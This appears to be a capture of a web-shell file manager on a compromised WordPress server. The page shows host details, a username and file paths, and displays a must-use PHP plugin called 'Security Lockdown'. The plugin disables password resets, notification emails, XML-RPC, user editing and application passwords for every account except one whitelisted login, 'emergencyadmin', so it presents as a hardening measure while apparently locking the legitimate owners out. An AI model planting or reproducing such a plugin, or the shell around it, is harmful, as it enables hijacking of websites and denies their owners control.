HEX
Server: Apache
System: Linux webserver101.turnkeywebspace.com 4.18.0-553.81.1.el8_10.x86_64 #1 SMP Mon Oct 27 11:29:19 EDT 2025 x86_64
User: mastech10 (1521)
PHP: 8.2.30
Disabled: show_source,system,shell_exec,passthru,exec,phpinfo,popen,proc_open,eval
$ pwd: /home/mastech10/www/runntrail.com/wp-content/plugins/mu-plugins/
Upload Files
File: /home/mastech10/www/runntrail.com/wp-content/plugins/mu-plugins/00-security-lockdown.php
<?php
/*
Plugin Name: Security Lockdown (User + Password Freeze)
Description: Temporarily blocks ALL password resets and user edits for everyone except whitelisted admins.
*/

// ====== CONFIG: add the only admin(s) allowed to make changes ======
$WHITELIST_LOGINS = ['emergencyadmin'];  // <-- replace with your safe admin login(s)

// Helper: is current user whitelisted?
function sl_is_whitelisted() {
    if (!is_user_logged_in()) return false;
    $u = wp_get_current_user();
    return in_array($u->user_login, (array)apply_filters('sl_whitelist_logins', $GLOBALS['WHITELIST_LOGINS'] ?? []), true);
}

// 1) Kill lost-password + reset links for everyone
add_filter('allow_password_reset', '__return_false');
add_filter('send_password_change_email', '__return_false');
add_filter('send_email_change_email', '__return_false');
add_filter('xmlrpc_enabled', '__return_false'); // no XML-RPC

// Block the reset screen itself
add_action('login_init', function () {
    if (isset($_REQUEST['action']) && in_array($_REQUEST['action'], ['lostpassword','rp','resetpass'], true)) {
        wp_die('Password resets are temporarily disabled.');
    }
});

// 2) Block password changes via wp-admin Users/Profile for non-whitelist
add_action('user_profile_update_errors', function($errors, $update, $user){
    if (sl_is_whitelisted()) return;
    // If any password fields present, block
    if (!empty($_POST['pass1']) || !empty($_POST['pass2']) || !empty($_POST['pass1-text'])) {
        $errors->add('sl_pwd_block', 'Password changes are temporarily disabled by security lockdown.');
    }
}, 10, 3);

// 3) Remove capabilities to edit/create/promote/delete users for non-whitelist (cap layer, hardest block)
add_filter('map_meta_cap', function($caps, $cap, $user_id, $args){
    $blocked_caps = ['edit_user','edit_users','create_users','promote_user','remove_user','delete_user','delete_users','list_users','add_users'];
    if (in_array($cap, $blocked_caps, true) && !sl_is_whitelisted()) {
        return ['do_not_allow'];
    }
    return $caps;
}, 10, 4);

// 4) Hard-stop user management screens for non-whitelist (extra guard)
add_action('admin_init', function () {
    if (sl_is_whitelisted()) return;

    $p = $_SERVER['PHP_SELF'] ?? '';
    // Users list, profile, edit-user, new user
    if (strpos($p, '/users.php') !== false || strpos($p, '/user-edit.php') !== false || strpos($p, '/user-new.php') !== false || strpos($p, '/profile.php') !== false) {
        wp_die('User management is temporarily disabled by security lockdown.');
    }

    // Block Application Passwords create/revoke
    remove_action('admin_init', 'wp_application_passwords_admin_init');
});

// 5) Force visual editor ON for all users (so they don't need profile access to enable it)
add_filter('user_can_richedit', '__return_true');
@ Telegram